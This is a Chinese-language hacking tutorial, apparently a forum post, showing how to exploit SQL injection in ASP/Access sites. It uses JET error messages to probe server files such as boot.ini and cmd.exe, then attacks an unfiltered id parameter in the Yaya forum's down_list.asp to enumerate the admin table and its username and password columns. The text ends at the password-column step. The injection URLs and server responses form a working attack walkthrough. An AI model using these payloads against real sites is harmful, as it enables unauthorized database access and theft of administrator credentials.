看到这个题目各位大虾小虾先别急着找东西砸我,的确现在跨库查询的资料随便找找都可以找到一大堆,不像以前那样想看点资料还得对着一大堆E文敲脑袋。今天我要说的是我前一段时间发现的一个跨库查询的一个新玩法,大家可要仔细听哦。
照例先介绍一下,在大概一个月前幻影旅团和灰色轨迹对这个问题进行了一些讨论就是在递交:
http://www.target.com/show.asp?id=1 ;or 0<>(select count(*) from admin.c)
会出现如下的错误提示:
Microsoft JET Database Engine 错误 '80004005'
找不到文件 'C:\WINNT\system32\admin.mdb'。
看到了吧,如果看过xhacker写的那份学习报告的人肯定就已经兴奋起来了,因为那份报告隐约提到了ACCESS的一个漏洞可以Dir C:\ /s!让我们继续玩下去吧,递交:
http://www.target.com/show.asp?id=1 ;or 0<>(select count(*) from c:\boot.ini)
返回:
Microsoft JET Database Engine 错误 '80004005'
找不到文件 'c:\boot.mdb'。
看样子from后面的部分我们是可以添加路径的了。既然想Dir当然就要访问了cmd.exe拉,再来:
http://www.target.com/show.asp?id=1 ;or 0<>(select count(*) from c:\winnt\system32\cmd.exe.c)
看看错误提示吧:
Microsoft JET Database Engine 错误 '80004005'
不可识别的数据库格式 'c:\winnt\system32\CMD.EXE'。
看样子我们的希望落空了哦(多次实践后你可以得到from后面跟的文件名的格式应该是这样:文件名.后缀名.任何字母,这样你才可以访问到文件名.后缀名的那个文件)。这个时候这个漏洞好象我们至多只可以确定一个目录或一个文件是否存在,当时我和很多人的想法一样认为这属于鸡肋级的漏洞,食之无味,弃之可惜。
后来在一天在帮一个朋友检测论坛安全性,看了看是用的雅艺论坛。首先我试了一下默认的数据库名。提交http://www.target.com/yabbs/data/1yabbs.asp,没有提示找不到文件,看样子是没改数据库名了。但是由于扩展名是.asp,我们仍然无法他的数据库。没办法,只好到硬盘去翻了半天把我原来的一套雅艺论坛拿出来看代码。结果还真发现了一个激动人心的地方,在论坛自带的插件的down_list.asp这个文件发现这样的一段代码:
if request("id")="" then
response.write "您没有选择相关软件,请返回"
response.end
end if
set rs=server.createobject("adodb.recordset")
sql="select Dclass.class,DNclass.Nclass,download.showname,download.classid,download.Nclassid,download.lasthits,download.downshow from download,Dclass,DNclass where download.classid=Dclass.classid and download.Nclassid=DNclass.Nclassid and download.ID="request("id")
看见没有,request("id")这个变量没做任何过滤就代如到查询语句中去了,我们可以进行SQL注入!说的容易,在做的时候却碰到了困难,递交如下URL:
http://www.target.com/yabbs/down_list.asp?id=1%20or%200<;>(select%20count(*)%20from%20admin)
成功返回页面,OK,存在admin表。再来确定保存用户名的列名:
http://www.target.com/yabbs/down_list.asp?id=1%20or%200<;>(select%20count(*)%20from%20admin where username)
也成功了,保存用户名的列为username,再来看密码列:
http://www.target.com/yabbs/down_list.asp?id=1%20or%200<;>(select%20count(*)%20from%20admin where password)